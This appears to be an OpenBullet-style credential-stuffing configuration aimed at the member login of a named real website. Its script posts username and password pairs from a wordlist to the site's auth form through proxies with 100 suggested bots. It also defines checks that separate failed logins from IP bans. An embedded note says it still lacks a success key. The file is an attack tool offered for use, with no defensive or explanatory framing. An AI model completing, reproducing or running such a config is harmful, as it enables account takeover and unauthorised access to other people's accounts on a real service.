[SETTINGS]
{
  "Name": "X-Art",
  "SuggestedBots": 100,
  "LastModified": "2018-05-06T13:11:17.677042+02:00",
  "AdditionalInfo": "NOT COMPLETED!!! Needs success key",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "https://www.x-art.com/auth.form" AutoRedirect=TRUE 
  CONTENT "rlm=Members+Area&for=http%253a%252f%252fwww%252ex%252dart%252ecom%252fmembers%252f&host_path=www.x-art.com&host_port=https&login_form=1&warning=&rmb=y&uid=<USER>&pwd=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "The email and password you entered don't match our records" 
  KEYCHAIN Ban OR 
    KEY "http://www.x-art.com/error" 
